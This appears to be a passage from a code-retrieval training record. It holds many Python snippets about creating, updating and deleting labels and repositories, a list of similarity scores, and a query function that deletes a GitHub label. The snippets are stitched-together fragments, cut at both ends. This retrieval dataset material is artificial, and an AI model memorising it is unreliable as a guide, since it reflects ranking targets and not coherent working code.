self.reload()\n return status", "def update_label(UniqueLabel, Label):\n\n UniqueLabel['Confidence'] = ((UniqueLabel['Confidence'] * UniqueLabel['Count']) + Label['Label']['Confidence'])/(UniqueLabel['Count'] + 1)\n UniqueLabel['TimeStamps'].append(Label['Timestamp'])\n UniqueLabel['Count'] += 1\n\t\n return", "def test_issue_replace_labels(self):\n pass", "def update_code_repository(CodeRepositoryName=None, GitConfig=None):\n pass", "def _UpdateLabels(self, args, migration_job, update_fields):\n add_labels = labels_util.GetUpdateLabelsDictFromArgs(args)\n remove_labels = labels_util.GetRemoveLabelsListFromArgs(args)\n value_type = self.messages.MigrationJob.LabelsValue\n update_result = labels_util.Diff(\n additions=add_labels,\n subtractions=remove_labels,\n clear=args.clear_labels\n ).Apply(value_type)\n if update_result.needs_update:\n migration_job.labels = update_result.labels\n update_fields.append('labels')", "def update_labels(self,label_dict):\n \t\tfor key in self.deps:\n \t\t\tfor dependent in self.deps[key]:\n \t\t\t\tlabel = dependent[1]\n \t\t\t\tlabel_dict[label] = label_dict.get(label,0) + 1\n \t\treturn label_dict", "def changeLabel(nuclideBase, newLabel):\n nuclideBase.label = newLabel\n byLabel[newLabel] = nuclideBase", "def test_labels_change(self):\n label_new = factories.LabelFactory(name=\"test_label\",\n object_type='Assessment')\n response = self.api.put(self.assessment, {'labels': [{\n \"name\": label_new.name,\n \"id\": label_new.id\n }]})\n self.assert200(response)\n notifs, notif_data = common.get_daily_notifications()\n updated = notif_data[\"[email protected]\"][\"assessment_updated\"]\n self.assertEqual(len(notifs), 1)\n self.assertEqual(\n updated[self.assessment.id][\"updated_data\"][\"LABELS\"],\n (\"test_label\", \"\")\n )", "def add_label(self, new_name, status):\n api_uri = self._uri_dict.get('addLabel')\n data = {\n 'newName': new_name,\n 'status': status\n }\n r_data = self._post(api_uri, data)\n return r_data", "def update_tt_label(video: dict):\n # try to get all text tracks\n if tts := video.get('text_tracks'):\n # go through all tracks\n for track in tts:\n # change the setting\n track['label'] = track['srclang']\n\n # get the video ID\n video_id = video.get('id')\n # create the JSON body\n json_body = { 'text_tracks': tts }\n # make the PATCH call\n r = get_cms().UpdateVideo(video_id=video_id, json_body=json_body)\n # check if all went well\n if r.status_code in [200,202]:\n print(f'Updated track labels for video ID {video_id} with status {r.status_code}.')\n # otherwise report the error\n else:\n print(f'Error code {r.status_code} updating track labels for video ID {video_id}:')\n print(r.text)", "def test_issue_edit_label(self):\n pass", "def test_issue_add_label(self):\n pass", "def __updateRepoInManager(self, row, oldName):\n repoDict = self.dataDict(row)\n self.manager.removeKickstartRepository(self.currentProject, oldName)\n # pylint: disable-msg=W0142\n self.manager.addKickstartRepository(self.currentProject, **repoDict)\n self.manager.saveKickstartFile(self.currentProject)", "def update(tag_name: str):\n\n image_full_name = f\"{GITLAB_IMAGE_URL}:{tag_name}\"\n _build(tag_name=tag_name, image_full_name=image_full_name)\n _test(image_full_name=image_full_name)\n _upload(tag_name=tag_name, image_full_name=image_full_name)", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def setLabel(*args):", "def test_job_save_label_update(self, lookup_users_mock, elasticsearch_update_mock):\n from bilbyui.models import BilbyJob, Label\n\n label1 = Label.objects.create(name=\"label 1\", description=\"my label 1\", protected=True)\n\n job = BilbyJob.objects.create(\n user_id=self.user.id,\n name=\"Test1\",\n description=\"first job\",\n job_controller_id=2,\n private=False,\n ini_string=create_test_ini_string({\"detectors\": \"['H1']\"}),\n )\n\n job.labels.add(label1)\n\n label1.name = \"label 2\"\n label1.save()\n\n # Update should have been called three times\n self.assertEqual(elasticsearch_update_mock.call_count, 3)\n\n self.assertDictEqual(\n elasticsearch_update_mock.mock_calls[-1].kwargs[\"doc\"], generate_elastic_doc(job, self.user)\n )", "def modify_labels(self, body, update_labels):\n for label_modifier in self.schema.get(\"labels\", []):\n\n # handle the service selector lookup\n spec = label_modifier.get(\"service\")\n if spec is not None:\n try:\n # get the service we're after\n service = self.k8s_inventory.k8s_client.get_service(\n name=spec.get(\"name\"),\n namespace=spec.get(\"namespace\"),\n )\n # reset the existing labels\n update_labels()\n # update with the selectors from the service\n update_labels(**service.spec.selector)\n except:\n return False\n\n # handle the static label modifications\n spec = label_modifier.get(\"label\")\n if spec is not None:\n updates = dict()\n updates[spec.get(\"key\")] = spec.get(\"value\")\n update_labels(**updates)\n\n return body", "def _update_label(self, change: Dict[str, Any]):\n dim = change['owner'].description\n coord = self.controls[dim]['coord'][dim, change['new']]\n self.controls[dim]['label'].value = coord_element_to_string(coord)", "def test_issue_remove_label(self):\n pass", "def pull_labels(self, org):\n pass", "def add_label(self, label_update):\n if not label_update in self.__labels:\n self.__labels.append(label_update)", "def post_issue_labels(repo, project, issue_number):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n new_label_ids = request.json\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = current_label_ids + new_label_ids\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def setLabel(self, label):\r\n\t\tself.label = label", "def setLabel(self, label):\r\n\t\tself.label = label", "def setLabel(self, label):\r\n\t\tself.label = label", "def create_label(self, org, name):\n pass", "def add_labels(number, labels):\n\n cmds = [github_cli, 'pr', 'edit', str(number)]\n for lab in labels:\n cmds += ['--add-label', lab]\n\n with subprocess.Popen(cmds) as p:\n _, err = p.communicate()\n print(err)", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def label(self, label):\n\n self._label = label", "def setLabel2(*args):", "def patch_issue_labels(repo, project, issue_number):\n add_label_ids = request.json.get('addLabelIds') or []\n remove_label_ids = request.json.get('removeLabelIds') or []\n\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = [label_id for label_id in current_label_ids + add_label_ids\n if label_id not in remove_label_ids]\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def test_issue_create_label(self):\n pass", "def update_repo_cli(api_client, repo_id, branch, tag, path):\n id_from_param_or_path = (repo_id if repo_id is not None\n else ReposApi(api_client).get_repo_id(path))\n content = ReposApi(api_client).update(id_from_param_or_path, branch, tag)\n click.echo(pretty_format(content))", "def EditLabel(self, item):\r\n \r\n self.Edit(item)", "def SetLabel(self, label):\r\n\r\n self.label = label", "def replace(self, labels):\r\n request = http.Request('PUT', self.get_url(), labels)\r\n\r\n return request, parsers.parse_json", "def UpdatePipelineToolStatusLabel( gui, statusMessage ):\n gui.pipelineToolStatusLabel.setText( statusMessage )", "def cmd_update(self):\n self.update_repository()\n results = self.results.getvalue()\n if results:\n print('---')\n print(results, end='')", "def rename_label(self, *args):\n return _ida_hexrays.vdui_t_rename_label(self, *args)", "def update(self, labels, preds):\n raise NotImplementedError()", "def addLabel(*args):", "def test_issue_delete_label(self):\n pass", "def on_save_label(self, image_id, label_id):\n logger.info(f\"New label saved for: {image_id} => {label_id}\")", "def labels_by_name(self, username, repository_name, access_token=None):\n return self._complete_request_by_name(\n username, repository_name, \"labels\", access_token)", "def update( self, trans, payload, **kwd ):\n repository_metadata_id = kwd.get( 'id', None )\n try:\n repository_metadata = metadata_util.get_repository_metadata_by_id( trans, repository_metadata_id )\n flush_needed = False\n for key, new_value in payload.items():\n if hasattr( repository_metadata, key ):\n old_value = getattr( repository_metadata, key )\n setattr( repository_metadata, key, new_value )\n if key in [ 'tools_functionally_correct', 'time_last_tested' ]:\n # Automatically update repository_metadata.time_last_tested.\n repository_metadata.time_last_tested = datetime.datetime.utcnow()\n flush_needed = True\n if flush_needed:\n trans.sa_session.add( repository_metadata )\n trans.sa_session.flush()\n except Exception, e:\n message = \"Error in the Tool Shed repository_revisions API in update: %s\" % str( e )\n log.error( message, exc_info=True )\n trans.response.status = 500\n return message\n repository_metadata_dict = repository_metadata.as_dict( value_mapper=default_value_mapper( trans, repository_metadata ) )\n repository_metadata_dict[ 'url' ] = web.url_for( controller='repository_revisions',\n action='show',\n id=trans.security.encode_id( repository_metadata.id ) )\n return repository_metadata_dict", "def update_label(\r\n self,\r\n root,\r\n label_var,\r\n text = \"\",\r\n delay = 2 #seconds\r\n ):\r\n label_var.set(text)\r\n root.update()\r\n time.sleep(delay)", "def labelUpdatedAction(self):\n text_to_update = self.lineEdit.text()\n\n if text_to_update != self.label.text():\n self.label.setText(text_to_update)\n self.textChanged.emit(text_to_update)\n\n self.label.setHidden(False)\n self.lineEdit.setHidden(True)\n self.lineEdit.blockSignals(True)\n self.label.blockSignals(False)", "def add_label_to_existing(hostname, new_labels):\n\n logging.debug('going to add labels %s to existing host %s' % (new_labels, hostname))\n\n checkmk_api_url = config['checkmk_api_url']\n checkmk_api_username = config['checkmk_api_username']\n checkmk_api_secret = config['checkmk_api_secret']\n checkmk_puppetdb_label = config['checkmk_puppetdb_label']\n\n # Save the attributes, save the ~world~ existing labels\n req_params = { 'action': 'get_host',\n '_username': config['checkmk_api_username'],\n '_secret': config['checkmk_api_secret'],\n 'hostname': hostname,\n 'output_format': 'json' }\n r = requests.post(checkmk_api_url, req_params)\n\n existing_labels = {}\n try:\n existing_labels.update(r.json()['result']['attributes']['labels'])\n except:\n pass\n\n # add new labels to existing labels and ensure from_puppetdb label present\n existing_labels.update(new_labels)\n existing_labels.update({ 'from_puppetdb': checkmk_puppetdb_label })\n\n payload = {'request': json.dumps({\n 'hostname': hostname,\n 'attributes': {\n 'labels': existing_labels\n }\n })}\n\n logging.debug('-- adding labels %s to host %s' % (existing_labels, hostname))\n r = requests.post(\"%s?action=edit_host&_username=%s&_secret=%s\" % (checkmk_api_url, checkmk_api_username, checkmk_api_secret), data=payload)\n logging.debug('-- got resp code = %d' % r.status_code)\n logging.debug('-- got resp text = %s' % r.text)\n r_json = json.loads(r.text)\n\n # Successful edit_host gives response of {\"result\": null, \"result_code\": 0}\n if r_json['result_code'] == 0 and r_json['result'] is None:\n logging.info('added labels %s to %s successfully' % (existing_labels, hostname))\n else:\n logging.warn('failed to add labels %s to host %s' % (r_json['result'], hostname))", "def set_label(self, mp, dn):\n for p in self.partition_list:\n if p[0] == mp:\n p[3] = dn", "def add_label(self, label):\n if not self.has_label(label):\n self.add_category(scheme=LABELS_SCHEME,\n term='%s#%s' % (LABELS_NS, label),\n label=label)", "def label(self, label: str):\n\n self._label = label", "def SetLabel(self, label):\r\n\r\n self._label = label", "def update_notebook(self, model, name, path=''):\n\t\tnew_name = model.get('name', name)\n\t\tnew_path = model.get('path', path)\n\t\tif path != new_path or name != new_name:\n\t\t self.rename_notebook(name, path, new_name, new_path)\n\t\tmodel = self.get_notebook(new_name, new_path, content=False)\n\t\treturn model", "def run(self):\n self.update_repos()", "def set_label(self, label_config):\n self.label_config = label_config", "def test_heads_setitem_existing(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n updatefile(repository.path / \"file\")\n heads[\"branch\"] = head.commit\n assert head.commit == heads[\"branch\"]", "def _set_label(self, input_label):\n self.label = input_label\n return self.label", "def update(self, request, pk=None):\n if not request.auth.user.is_staff:\n return Response(\n {'message': 'You must be an admin to update categories.'},\n status=status.HTTP_403_FORBIDDEN\n )\n\n # Do mostly the same thing as POST, but instead of\n # creating a new instance of Category, get the Category record\n # from the database whose primary key is `pk`\n category = Categories.objects.get(pk=pk)\n category.label = request.data[\"label\"]\n \n\n category.save()\n\n # 204 status code means everything worked but the\n # server is not sending back any data in the response\n return Response({}, status=status.HTTP_204_NO_CONTENT)", "def update_mirror(self, repo, body):\n url = self._repo_url(repo, other='/mirror')\n response = self.rest.put(url)\n\n if response.status_code is not 200:\n self.module.fail_json(msg=response.info)\n return response.info", "def __add_new_label(self, name, value):\n self.__labels_dict[name] = value", "def label(self, value):\n\t\tself._label = value", "def patch_repos(self):", "def edit_address(self, new_label: str) -> None:\n self.address_form.label_input.fill(new_label)\n self.address_form.save_button.click()", "def set_label(self, label):\n self._remove_child_widget(self._label)\n self._add_child_widget(label)\n self._label = label\n self.update(self._label)", "def _update_head(self, index_entry, branch, new_id):\r\n index_entry['versions'][branch] = new_id\r\n self.db_connection.update_course_index(index_entry)", "def set_label(self, key: str, value: str):\n self.labels[key] = value" ]
[ "0.6681116", "0.6653021", "0.64337254", "0.6265893", "0.62407804", "0.6226869", "0.61520106", "0.6127353", "0.61121166", "0.61037016", "0.6094828", "0.603661", "0.60320926", "0.59240484", "0.59008676", "0.58834106", "0.58732027", "0.5860932", "0.5839947", "0.58363944", "0.5802565", "0.5790831", "0.57733464", "0.5766619", "0.5702953", "0.57003826", "0.5630814", "0.5615852", "0.55864763", "0.5586208", "0.55831957", "0.555776", "0.5546136", "0.5537413", "0.54940754", "0.5470725", "0.5470725", "0.5470725", "0.5470725", "0.5470725", "0.54380965", "0.54193985", "0.5413148", "0.5409756", "0.5404242", "0.53837293", "0.53681153", "0.53585047", "0.53585047", "0.53585047", "0.5329807", "0.5318072", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.53061664", "0.5301767", "0.5298573", "0.5297823", "0.5280904", "0.5280097", "0.5263627", "0.5262987", "0.523742", "0.52269125", "0.5213891", "0.5208803", "0.5185721", "0.5182142", "0.51768833", "0.5176376", "0.5174705", "0.5173992", "0.5157908", "0.51414376", "0.51409745", "0.5136574", "0.5132685", "0.5127844", "0.5125647", "0.51244795", "0.5108005", "0.50935626", "0.50909394", "0.5088174", "0.5083873", "0.508309", "0.5078021", "0.50771505", "0.5076118", "0.5072969", "0.5071869", "0.50689673" ]
0.72466385
0
Delete existing label in given repository
def delete_label(self, repository, name, **kwargs): response = self.session.delete( '{}/repos/{}/labels/{}'.format( self.GH_API_ENDPOINT, repository, name ) ) if response.status_code != 204: raise GitHubError(response)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_issue_delete_label(self):\n pass", "def delete(ctx: click.Context, repository_path):\n root_commands.cmd_delete(ctx.obj, repository_path)", "def repository_delete(ctx: click.Context, repository_name):\n subcommand_repository.cmd_delete(ctx.obj, repository_name)", "def delete_label(id):\n dao.delete_label(id)\n return jsonify(dao.get_label(id))", "def delete_issue_label(repo, project, issue_number, delete_label_id):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n current_label_ids = dao.get_issue_label_ids(issue_path)\n\n revised_label_ids = [label_id for label_id in current_label_ids\n if label_id != delete_label_id]\n\n dao.set_issue_label_ids(issue_path, revised_label_ids)\n\n return if_found(dao.get_issue_labels(issue_path))", "def test_issue_remove_label(self):\n pass", "def delete(repo):\n print('Repo: %s' % repo)\n print('Deleted')", "def delete_label(self, label_id: str):\n return delete_label(self.api_key, label_id)", "def delete_code_repository(CodeRepositoryName=None):\n pass", "def delete(self, label):\n if label in self.bindings:\n if not self.locked:\n i = self.bindings[label]\n del self.bindings[label]\n return i\n else:\n if self.parent:\n return self.parent.delete(label)\n else:\n raise SnekEvaluationError('attempting to delete non-existing name {}'.format(label))", "async def removed_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n await set_status(event, gh)", "def delete_manifest_label(label_uuid, tag_manifest):\n\n # Find the label itself.\n label = get_manifest_label(label_uuid, tag_manifest)\n if label is None:\n return None\n\n if not label.source_type.mutable:\n raise DataModelException(\"Cannot delete immutable label\")\n\n # Delete the mapping records and label.\n (TagManifestLabelMap.delete().where(TagManifestLabelMap.label == label).execute())\n\n deleted_count = TagManifestLabel.delete().where(TagManifestLabel.label == label).execute()\n if deleted_count != 1:\n logger.warning(\"More than a single label deleted for matching label %s\", label_uuid)\n\n deleted_count = ManifestLabel.delete().where(ManifestLabel.label == label).execute()\n if deleted_count != 1:\n logger.warning(\"More than a single label deleted for matching label %s\", label_uuid)\n\n label.delete_instance(recursive=False)\n return label", "def remove(self, label):\n\n\t\t\tself[label].remove()", "def _del_label(self):\n label = self.combobox.currentText()\n if label:\n button = QMessageBox.warning(self, \"Delete label\", \n \"Are you sure that you want to delete label %s ?\" % label,\n QMessageBox.Yes,\n QMessageBox.No)\n if button == QMessageBox.Yes:\n self._label_config.remove_label(str(label))\n self._update_combobox()", "def delete_label(self, label_key):\n # type: (str) -> bool\n headers = Headers({\"content-type\": \"application/json\", \"accept\": \"application/json\"})\n response_result = self.connection.api_call(\n \"DELETE\",\n [\"v1\", \"datasets\", self.dataset_id, \"resources\", self.id, \"labels\", label_key],\n headers=headers,\n )\n\n if response_result:\n # Sync the latest data from API to prevent inconsistency\n self.refresh()\n\n return True", "def remove_labels(number, labels):\n\n cmds = [github_cli, 'pr', 'edit', str(number)]\n for lab in labels:\n cmds += ['--remove-label', lab]\n\n with subprocess.Popen(cmds) as p:\n _, err = p.communicate()\n print(err)", "def remove_label(self, label):\n for category in self.get_categories(LABELS_SCHEME):\n if category.label == label:\n self.category.remove(category)", "def RemoveLabel(self, label):\n if self.labels is None:\n self.labels = set()\n else:\n try:\n self.labels.remove(label)\n except KeyError:\n pass", "def delete_metering_label(self, label):\r\n return self.delete(self.metering_label_path % (label))", "def remove(self: TokenMatcher, label: str) -> None:\n try:\n del self._patterns[label]\n del self._callbacks[label]\n except KeyError:\n raise ValueError(\n f\"The label: {label} does not exist within the matcher rules.\"\n )", "def test_delete_metering_label(self):\r\n resource = 'metering_label'\r\n cmd = metering.DeleteMeteringLabel(\r\n test_cli20.MyApp(sys.stdout), None)\r\n myid = 'myid'\r\n args = [myid]\r\n self._test_delete_resource(resource, cmd, myid, args)", "def _simple_deletion(self, operation, labels):\r\n label_strings = []\r\n for label in labels:\r\n if inspect.isclass(label) and issubclass(label, Edge):\r\n label_string = label.get_label()\r\n elif isinstance(label, Edge):\r\n label_string = label.get_label()\r\n label_strings.append(label_string)\r\n\r\n return self._delete_related(operation, label_strings)", "def __delitem__(self, doc_label):\n if doc_label not in self.docs:\n raise KeyError('document `%s` not found in corpus' % doc_label)\n del self.docs[doc_label]", "def remove_label(self, key: str):\n del self.labels[key]", "def delete(connection, rid=None, repo=None):\n\n if repo is None:\n repo = Repository(connection, rid)\n\n return repo.delete()", "def delete(self):\n\n lod_history = self.repo._get_lod_history(self.lod)\n assert lod_history.exists()\n lod_history.update(self.repo._youngest, None)\n self._mark_deleted()", "def test_heads_delitem_pass(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n del heads[\"branch\"]\n assert \"branch\" not in heads", "def __gitDeleteBranch(self):\n self.vcs.gitDeleteRemoteBranch(self.project.getProjectPath())", "def delete_tag(tag, directory=None):\n execute_command('git tag -d {0}'.format(tag), shell=True, cwd=directory)", "def fusion_api_delete_repository(self, uri, api=None, headers=None):\n return self.repository.delete(uri=uri, api=api, headers=headers)", "def rm_task():\n # get task label from user\n responses = accept_inputs([\"Task label\"])\n label = responses[\"Task label\"]\n # check for existence of task\n results = query_with_results(\"select * from task where label = ?\", [label])\n if len(results) == 0:\n print(\"No task found with label '%s' that we could remove.\" % label)\n return\n # the task exists, so remove it\n query_no_results(\"delete from task where label = ?\", [label]) \n # remove all person associations\n query_no_results(\"delete from task_person_pair where task = ?\", [label])\n print(\"Task with label '%s' removed.\" % label)", "def execute(self: \"DeleteBranchOperator\", context: Dict[str, Any]) -> Any:\n hook = NessieHook(conn_id=self.conn_id)\n\n hook.delete_reference(self.branch)", "def delete_branch(api_access_token: str, repo: str, ref: str) -> response.Response:\n api = github.Github(api_access_token)\n\n repository = api.get_repo(repo)\n repository_ref = repository.get_git_ref('heads/{}'.format(ref))\n repository_ref.delete()\n\n return response.success('Successfully deleted \"{}\" from repository \"{}\"'.format(ref, repo))", "def remove_label(self, ):\n if self.AttributeNames.LABEL in self.attrs:\n del self.attrs[self.AttributeNames.LABEL]\n return self", "def test_networking_project_network_tag_delete(self):\n pass", "def delete(self, git_repo_id: int):\n self.datastore.delete(document_id=git_repo_id)\n return None, 204", "def removeRepository(self, name):\n self.manager.removeKickstartRepository(self.currentProject, name)\n self.manager.saveKickstartFile(self.currentProject)\n self.refresh()", "def delete_from_repo(self, interest):\n# co_name = self.parse_co_name(interest.getName())\n\n # by name prefix\n # by interest\n # find last node according to given name prefix\n last_node = self.locate_last_node(interest.getName())\n if not last_node:\n return None\n\n # apply selectors here. AT MOST one node shall be left \n nodes = self.apply_selectors(last_node, interest)\n if not nodes:\n return None\n\n _ids = []\n for node in nodes:\n node.isolate()\n node.delete()", "def delete(self):\n if not hasattr(self, 'id'):\n raise BadReference('No matching issue on disk')\n shutil.rmtree(self.paths['root'])", "def test_issue_clear_labels(self):\n pass", "def delete(self, name):\n err = C.git_remote_delete(self._repo._repo, to_bytes(name))\n check_error(err)", "def delete_entity(self, context, lb_obj):\n resource_path = \"%s/%s/%s\" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id)\n msg = _(\"NetScaler driver lb_obj removal: %s\") % lb_obj.id\n LOG.debug(msg)\n self.client.remove_resource(context.tenant_id, resource_path)", "def removeLabelFromPage(self, label, page):\n return self.pm_getSpaceManager().removeLabelFromPage(self._unbox(label), self._unbox(page))", "def remove(self):\n print \"*** Removing repository '%s'\" % self.destination\n shutil.rmtree(self.destination)\n self.destination = None", "def delInfo(label: str):\r\n\r\n if not self.isClosed:\r\n if label in self.__identity_info.keys():\r\n del self.__identity_info[label]\r\n else:\r\n raise HDDOPermissionException('Tried to delete non-existing identity information in a HealthDominoDataObject.')\r\n else:\r\n raise HDDOPermissionException('Tried to delete identity information from a closed HealthDominoDataObject.')", "def delete_branch(self):\n for p in self.get_branch():\n if p.kind == 'image':\n self.get(p.uid).delete_image()\n else: \n # delete related tags\n for t in self.Tag.list(page=p.uid):\n t.delete()\n # delete page \n p.delete()", "def delete(self, name):\n if (self.model_dir / (str(name) + '.pkl')).exists():\n (self.model_dir / (str(name) + '.pkl')).unlink()", "def delData(self, label):\n\n return self._data.pop(label, None)", "def delete_repository(repository_id):\n user = get_jwt_identity()\n repository = Repository.query.get_by_id(repository_id, user)\n if repository is None:\n raise ApiException(400, \"No module with this id was found.\")\n if str(repository.owner_id) != user['id']:\n raise ApiException(400, \"Not enough permissions for this action.\")\n repository.delete()\n app.db.session.commit()\n return jsonify()", "def delete_inE(self, *labels):\r\n self._simple_deletion('inE', labels)", "def branch_delete(request, branch_id):\n branch = models.Branch.get_by_id(int(branch_id))\n if branch.owner != request.user:\n return HttpTextResponse('You do not own this branch', status=403)\n\n repo_key = branch.repo_key\n branch.key.delete()\n num_branches = models.Branch.query(models.Branch.repo_key == repo_key).count()\n if not num_branches:\n # Even if we don't own the repository? Yes, I think so! Empty\n # repositories have no representation on screen.\n repo_key.delete()\n\n return HttpResponseRedirect(reverse(repos))", "def delete_entity(self, context, pool):\n resource_path = \"%s/%s/%s\" % (RESOURCE_PREFIX, POOLS_RESOURCE,\n pool.id)\n msg = _(\"NetScaler driver pool removal: %s\") % pool.id\n LOG.debug(msg)\n self.client.remove_resource(context.tenant_id, resource_path)", "def _simple_deletion(self, operation, labels):\n from mogwai.models.edge import Edge\n\n label_strings = []\n for label in labels:\n if inspect.isclass(label) and issubclass(label, Edge):\n label_string = label.get_label()\n elif isinstance(label, Edge):\n label_string = label.get_label()\n elif isinstance(label, string_types):\n label_string = label\n else:\n raise MogwaiException('traversal labels must be edge classes, instances, or strings')\n label_strings.append(label_string)\n\n future = connection.future_class()\n future_result = self._delete_related(operation, label_strings)\n\n def on_read(f2):\n try:\n result = f2.result()\n except Exception as e:\n future.set_exception(e)\n else:\n future.set_result(result)\n\n def on_save(f):\n try:\n stream = f.result()\n except Exception as e:\n future.set_exception(e)\n else:\n future_read = stream.read()\n future_read.add_done_callback(on_read)\n\n future_result.add_done_callback(on_save)\n\n return future", "def delete():", "def delete_notebook(self, name, path=''):\n\t\tos_path = self._get_os_path(name, path)\n\t\tif not key_exists(self.bucket, os_path):\n\t\t\traise web.HTTPError(404, u'Notebook does not exist: %s' % os_path)\n\n\t\t# clear checkpoints\n\t\tfor checkpoint in self.list_checkpoints(name, path):\n\t\t\tcheckpoint_id = checkpoint['id']\n\t\t\tcp_path = self.get_checkpoint_path(checkpoint_id, name, path)\n\t\t\tif key_exists(self.bucket, cp_path):\n\t\t\t\tself.log.debug(\"Unlinking checkpoint %s\", cp_path)\n\t\t\t\tself.bucket.delete_key(cp_path)\n\n\t\tself.log.debug(\"Unlinking notebook %s\", os_path)\n\t\tself.bucket.delete_key(os_path)", "def delete(self, namespace_name, repository_name, username):\n try:\n model.delete_repo_permission_for_user(username, namespace_name, repository_name)\n except DeleteException as ex:\n raise request_error(exception=ex)\n\n log_action(\n \"delete_repo_permission\",\n namespace_name,\n {\"username\": username, \"repo\": repository_name, \"namespace\": namespace_name},\n repo_name=repository_name,\n )\n\n return \"\", 204", "def do_command(self, args):\n imageops = dbops.Images()\n imageops.delete(args)", "def test_collection_delete(repository_collection, faker):\n x_name = faker.word()\n\n repository_collection.delete(x_name)\n\n repository_collection.client.scripts.create_if_missing.assert_called_once()\n repository_collection.client.scripts.run.assert_called_with(\n 'nexus3-cli-repository-delete', data=x_name)", "def svn_fs_delete(*args):\r\n return _fs.svn_fs_delete(*args)", "def delete_tag(self,tag):\r\n\r\n # with shelf\r\n if self.using_shelf:\r\n del self.tag_dict[tag]", "def delete_command(arguments: List[str]) -> None:\n if len(arguments) != 2:\n print('Required 1 argument for create command') # noqa: WPS421\n return\n token = token_load.load()\n logic.delete(token, gist_id=arguments[1])", "def delete_command():\n global selected_tuple\n backend.delete(selected_tuple[0])", "def on_delete_repository(self, repo):\n installation = self.get_installation(repo.integration_id,\n repo.organization_id)\n client = installation.get_client()\n try:\n client.delete_project_webhook(\n repo.config['project_id'],\n repo.config['webhook_id'])\n except ApiError as e:\n if e.code == 404:\n return\n installation.raise_error(e)", "def delete(obj, path, ignore_missing=False):\n return glom(obj, Delete(path, ignore_missing=ignore_missing))", "def remove_recog_label(self, event):\n\t\tc=self.seqframe\n\t\tc.delete('recogseqlabel')\n\t\treturn", "def delete_entry(results):\n repo_ids = [str(item['id']) for item in results]\n repo_ids = \",\".join(repo_ids)\n sql = \"DELETE FROM python_repos where repo_id in (:ids)\".replace(\":ids\",repo_ids)\n db = get_db()\n cursor = db.execute(sql)\n db.commit()", "def delete_namespaces_with_label(self, label_selector):\n return [\n self.core_client.delete_namespace(namespace.metadata.name)\n for namespace in self.get_namespaces(label_selector=label_selector).items\n ]", "def remove_tag(tag):\n check_call(['git', 'tag', '-d', tag])", "def __init__(self, datastoreio_stub, label=None):\n super(DeleteModels, self).__init__(label=label)\n self.datastoreio = datastoreio_stub", "def _label_language_delete(self, languagename, langs,\n curr_lang, name_exists):\n chrdict = self._chrdict\n varlist = self._varlist\n \n # shorten language list\n langs = [lang for lang in langs if lang != languagename]\n \n if languagename == curr_lang:\n vlblist = self._vlblist\n lbllist = self._lbllist\n \n curr_lang = langs[0]\n if not self._quiet:\n msg = \"{}(language {} now current language)\"\n print(msg.format(\"{txt}\" if IN_STATA else \"\", curr_lang))\n \n varlab_key = \"_lang_v_\" + curr_lang\n vallab_key = \"_lang_l_\" + curr_lang\n \n # replace data label, _lang_list, and _lang_c\n dta_dict = chrdict[\"_dta\"]\n dta_dict[\"_lang_c\"] = curr_lang\n dta_dict[\"_lang_list\"] = \" \".join(langs)\n if varlab_key in dta_dict:\n self._data_label = dta_dict.pop(varlab_key)\n \n # Stata does not drop value label\n \n # Replace variable and value labels, \n # and pop these entries from chrdict.\n # If this leaves a chrdict[varname] empty, delete it.\n for varname, i in zip(varlist, range(self._nvar)):\n lbllist[i] = '' \n # Next line probably not necessary. \n # There should be a var label in chrdict, \n # even if it's empty str.\n vlblist[i] = ''\n if varname in chrdict:\n var_dict = chrdict[varname]\n if varlab_key in var_dict:\n vlblist[i] = var_dict.pop(varlab_key)\n if vallab_key in var_dict:\n lbllist[i] = var_dict.pop(vallab_key)\n if len(var_dict) == 0:\n del chrdict[varname]\n \n # if deleted language is not the current language, \n # delete entries from chrdict\n else:\n varlab_key = \"_lang_v_\" + languagename\n vallab_key = \"_lang_l_\" + languagename\n \n # delete data label (if necessary) and replace _lang_list\n dta_dict = chrdict[\"_dta\"]\n dta_dict[\"_lang_list\"] = \" \".join(langs)\n if varlab_key in dta_dict:\n del dta_dict[varlab_key]\n \n # Stata does not drop value label\n \n # Delete variable and value label entries from chrdict.\n # If this leaves the sub-dictionary empty, delete it.\n for varname, i in zip(varlist, range(self._nvar)):\n if varname in chrdict:\n var_dict = chrdict[varname]\n if varlab_key in var_dict:\n del var_dict[varlab_key]\n if vallab_key in var_dict:\n del var_dict[vallab_key]\n if len(var_dict) == 0:\n del chrdict[varname]", "def delete_inE(self, *labels):\n return self._simple_deletion('inE', labels)", "def delete(self):\n ...", "def delete_pod_in_a_namespace(self, namespace, name, label_selector=\"\"):\n api_response = None\n try:\n api_response = self.ocp_pods.delete(namespace=namespace, name=name, label_selector=label_selector)\n except ApiException as e:\n logger.error(\"Exception deleting pod: %s\\n\", e)\n return api_response", "def delete(self, src):\n\n if self.noop:\n logger.info(\"No-Op Delete: %s.tar\" % self.bucket + src)\n else:\n logger.info(\"Trying to delete %s.tar\" % self.bucket + src)\n self.client.delete(self.bucket + src + \".tar\")", "def delete(self, tree_path):\n\t\traise NotImplementedError", "def delete_taggit_tags(apps, schema_editor):\n 